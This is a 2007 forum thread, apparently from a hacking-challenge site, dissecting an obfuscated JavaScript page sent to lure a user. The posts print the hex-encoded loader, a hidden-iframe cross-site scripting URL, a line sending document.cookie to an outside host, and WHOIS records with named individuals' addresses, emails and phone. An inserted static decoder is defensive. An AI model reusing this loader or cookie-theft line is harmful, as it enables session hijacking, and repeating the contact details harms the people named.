| Author | Post | |||
| unknown user | some nobody registered an account, to send me a pm, and trick me into going to a webpage. the webpage itself was nothing more than some lame javascript exploit, i didn't even bother to dissect it, have fun 
<center>This site was removed.</center>
<script type="text/javascript">
function CA9EBC9067A1A3B4DA21ED549CC195(E6C54EFB7B7C634244312B243){
      function F645E88B3262503F555C823E7274(){
              return 16;
      }
      return(parseInt(E6C54EFB7B7C634244312B243,F645E88B3262503F555C823E7274()));
}
function F3EC4FA958E96D04C01772D(AE2DF00C9F45DE9BB19C82CD0FE07){
      var A10B295E47E54F6DB474AB13D46E268B="";
      for(F7E49DF95174BE5BD9817DF4298D5=0;
             F7E49DF95174BE5BD9817DF4298D5<AE2DF00C9F45DE9BB19C82CD0FE07.length;
             F7E49DF95174BE5BD9817DF4298D5+=2){
             A10B295E47E54F6DB474AB13D46E268B+=   
(String.fromCharCode(CA9EBC9067A1A3B4DA21ED549CC195(AE2DF00C9F45DE9BB19C82CD0FE07.substr(F7E49DF95174BE5BD9817DF4298D5,2))));
       }
       document.write(A10B295E47E54F6DB474AB13D46E268B);
}
F3EC4FA958E96D04C01772D("3C696672616D652077696474683D30206865696768743D30207374796C653D227669736962696C6974793A2068696464656E3B22207372633D22687474703A2F2F6272696768742D736861646F77732E6E65742F6368616C6C656E6765732F6578706C6F6974732F6578706C6F69745F6B616C6974727573742F646F6F722E7068703F62726F746865723D253030253232313233253230616E642532306B6579686F6C653D2532322533437363726970742532307372633D687474703A2F2F73777735342E636F6D2F312E68746D2533452533432F7363726970742533452532322F2A266B65793D313233267375626D69743D576973646F6D223E3C2F696672616D653E");
</script>
<script type="text/javascript">
function AF634F6EC0791551A92AE42FFC(DE9548D549DF7A63CBB6){
       function A55B5714950F036A6(){
                return 16;
       }
       return(parseInt(DE9548D549DF7A63CBB6,A55B5714950F036A6()));
}
function BCFF1D71254515531C46F86A3(E71A091436ECDC2774B80351EF481){
      var F72C6A26438F3FBE05BD176589="";
      for(C1A1F29017FDA9F0720920327BFCF1=0;
             C1A1F29017FDA9F0720920327BFCF1<E71A091436ECDC2774B80351EF481.length;
             C1A1F29017FDA9F0720920327BFCF1+=2){
             F72C6A26438F3FBE05BD176589+=
                     (String.fromCharCode(AF634F6EC0791551A92AE42FFC(E71A091436ECDC2774B80351EF481.substr(C1A1F29017FDA9F0720920327BFCF1,2))));
       }
      document.write(F72C6A26438F3FBE05BD176589);
}
</script>
who knows perhaps it even exploits bright shadows... the script never executed in my browser, anyway nice try. edit: added some newlines | |||
| 19.12.2007 09:41:45 | 
 | |||
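The wrapper in the post above decodes a string of hex pairs with `parseInt(..., 16)` and `String.fromCharCode`, then hands the result to `document.write`. The following added example (not code from the thread) decodes such a literal as plain text under Node.js without rendering it, then lists the iframes it finds and any script URL percent-encoded inside their `src`. The sample input and the hosts `forum.example` and `collector.example` are constructed placeholders.

```javascript
// Added example: static analysis only. The page source is handled as text and
// nothing is evaluated or rendered.

// Helper used only to build the constructed sample below.
function toHex(text) {
  return Array.from(text, c => c.charCodeAt(0).toString(16).padStart(2, '0'))
    .join('').toUpperCase();
}

// Constructed sample with the same shape as the posted script; hosts are placeholders.
const INNER = '<iframe width=0 height=0 style="visibility: hidden;" ' +
  'src="http://forum.example/door.php?q=%22%3Cscript%20src=' +
  'http://collector.example/1.htm%3E%3C/script%3E%22&key=123"></iframe>';
const SAMPLE_HTML = '<script type="text/javascript">\n' +
  'function a(h){return parseInt(h,16);}\n' +
  'function b(s){var o="";for(var i=0;i<s.length;i+=2)' +
  '{o+=String.fromCharCode(a(s.substr(i,2)));}document.write(o);}\n' +
  'b("' + toHex(INNER) + '");\n</script>';

// Decode every quoted string literal that consists only of hex pairs.
function decodeHexLiterals(source, minLength = 16) {
  const decoded = [];
  for (const m of source.matchAll(/(["'])((?:[0-9A-Fa-f]{2})+)\1/g)) {
    if (m[2].length < minLength) continue; // skip short literals such as "16"
    let text = '';
    for (let i = 0; i < m[2].length; i += 2) {
      text += String.fromCharCode(parseInt(m[2].slice(i, i + 2), 16));
    }
    decoded.push(text);
  }
  return decoded;
}

// Report iframes in the decoded markup and any <script src> hidden in their URLs.
function analyse(html) {
  const findings = [];
  for (const markup of decodeHexLiterals(html)) {
    for (const tag of markup.match(/<iframe\b[^>]*>/gi) || []) {
      const m = tag.match(/\bsrc\s*=\s*"([^"]*)"/i) || tag.match(/\bsrc\s*=\s*([^\s>]+)/i);
      const src = m ? m[1] : '';
      let url = src;
      try { url = decodeURIComponent(src); } catch (e) { /* malformed escape: keep raw */ }
      const hidden = /visibility\s*:\s*hidden/i.test(tag) ||
        /\b(?:width|height)\s*=\s*["']?0\b/i.test(tag);
      const injectedScripts = Array.from(
        url.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']?([^\s"'>]+)/gi), x => x[1]);
      findings.push({ src, hidden, injectedScripts });
    }
  }
  return findings;
}

console.log(JSON.stringify(analyse(SAMPLE_HTML), null, 2));
```
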
| quangntenemy              | WTF <iframe width="0" height="0" src="http://bright-shadows.net/challenges/exploits/exploit_kalitrust/door.php?brother=%00%22123%20and%20keyhole=%22%3Cscript%20src=http://sww54.com/1.htm%3E%3C/script%3E%22/*&key=123&submit=Wisdom" style="visibility: hidden;"> <html> <head/> <body/> </html> </iframe> <iframe width="0" height="0" src="http://www.bright-shadows.net/challenges/exploits/exploit_kalitrust/door.php?brother=%00%22123%20and%20keyhole=%22%3Cscript%20src=http://sww54.com/1.htm%3E%3C/script%3E%22/*&key=123&submit=Wisdom" style="visibility: hidden;"> <html> <head/> <body/> </html> </iframe> Didn't know MYSQL itself was XSS vulnerable. Don't think it will work inside iframe, but let's see if anyone got my cookie... | |||
|  19.12.2007 10:00:49 | 
 | |||
| unknown user | and this is where that pointed to document.location='http://shad0w.onlinehoster.net/gate/gate.php?str='+document.cookie; | |||
| 19.12.2007 10:03:39 | 
 | |||
| unknown user | this is the whois info of sww54.com
Registrant: patitta pataya 90/5 Yingcha-roen village HatYai, Songkhla 90110 Thailand
Registered through: Domains Priced Right
Domain Name: SWW54.COM
Created on: 26-Feb-07
Expires on: 26-Feb-08
Last Updated on:
Administrative Contact: kaewkarn, veerasak vee_k@hotmail.com NiceStyle.com 21/33 Lakmuang rd.,T.Naimuang Muang, Surin 32000 Thailand (081) 967-1924
Technical Contact: kaewkarn, veerasak vee_k@hotmail.com NiceStyle.com 21/33 Lakmuang rd.,T.Naimuang Muang, Surin 32000 Thailand (081) 967-1924
Domain servers in listed order: DNS1.PREMIUMDNS.NET DNS2.PREMIUMDNS.NET | |||
| 19.12.2007 10:15:07 | 
 | |||
| unknown user | quang it's a viable exploit i would suggest you change your cookie   | |||
| 19.12.2007 10:22:45 | 
 | |||